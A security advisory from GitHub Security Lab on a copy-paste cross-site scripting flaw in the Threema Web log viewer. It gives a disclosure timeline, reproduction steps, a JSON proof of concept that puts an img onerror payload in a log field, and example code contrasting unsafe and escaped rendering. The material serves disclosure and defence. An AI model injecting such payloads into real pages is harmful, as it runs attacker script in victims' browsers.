Coordinated Disclosure Timeline
- 2021-09-15: Report sent to security2021@threema.ch
- 2021-09-16: Maintainers request more details about the issue
- 2021-09-21: Issue is fixed
Summary
Copy-paste XSS in Threema Web text editor
Product
Threema Web
Tested Version
Details
Issue: Copy-paste XSS in Threema-Web (GHSL-2021-1004)
The Threema Web text editor is vulnerable to copy-paste cross-site scripting (XSS). For this particular type of XSS, the victim needs to be fooled into copying a malicious payload into the text editor.
Proof of concept (tested on Chrome):
- Clone the project:
git clone git@github.com:threema-ch/threema-web.git
- Open the troubleshoot/log.html file in a web browser.
- Focus the page.
- Paste the following into the page:
{
  "config": {},
  "browser": "XSS browser",
  "log": [
    [
      1631303341684,
      "debug",
      "%c[State-S]",
      "",
      {
        "constructor": "<img src='foo' onerror='alert(1)'>"
      }
    ]
  ]
}
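The rendering pattern behind this class of bug, next to an escaped version, as an added example that is not Threema Web's code. The names renderRecordUnsafe, renderRecordSafe, describeArg and parsePastedLog, the display rule for object arguments and the level allowlist are assumptions made for illustration; the input is the proof of concept above.

```javascript
// Added example; not Threema Web's code. Function names are hypothetical.
// Constructed input: the proof-of-concept log from this advisory, as pasted text.
const pastedText = JSON.stringify({
  config: {}, browser: "XSS browser",
  log: [[1631303341684, "debug", "%c[State-S]", "",
         { constructor: "<img src='foo' onerror='alert(1)'>" }]],
});

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
const escapeHtml = (v) => String(v).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);

// Assumed display rule: object arguments are shown by their "constructor" label.
function describeArg(arg) {
  if (arg !== null && typeof arg === "object" && typeof arg.constructor === "string") {
    return arg.constructor;
  }
  return typeof arg === "string" ? arg : JSON.stringify(arg);
}

// Vulnerable pattern: pasted values concatenated into markup meant for innerHTML.
function renderRecordUnsafe([ts, level, tag, , ...args]) {
  return `<div class="${level}">${ts} ${tag} ${args.map(describeArg).join(" ")}</div>`;
}

// Hardened pattern: allowlist the level (assumed set), escape every pasted value.
const LEVELS = new Set(["debug", "trace", "info", "warn", "error"]);
function renderRecordSafe([ts, level, tag, , ...args]) {
  const cls = LEVELS.has(level) ? level : "unknown";
  const time = Number.isFinite(ts) ? new Date(ts).toISOString() : "invalid-time";
  const body = args.map(describeArg).map(escapeHtml).join(" ");
  return `<div class="${cls}">${time} ${escapeHtml(tag)} ${body}</div>`;
}

// Reject pastes that do not have the expected shape before rendering anything.
function parsePastedLog(text) {
  const data = JSON.parse(text);
  if (!data || !Array.isArray(data.log) || !data.log.every(Array.isArray)) {
    throw new TypeError("not a log export");
  }
  return data.log;
}

const records = parsePastedLog(pastedText);
console.log(renderRecordUnsafe(records[0])); // markup still contains the <img> element
console.log(renderRecordSafe(records[0]));   // payload appears as inert text
```

In the browser, assigning pasted values through textContent or createTextNode gives the same result without hand-written escaping.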
Note: This issue was found using the following CodeQL query
Impact
This issue may lead to XSS with user interaction
Credit
This issue was discovered by GHSL team member @erik-krogh (Erik Kristensen) using the CodeQL query contributed by @bananabr (Daniel Santos).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-1004 in any communication regarding this issue.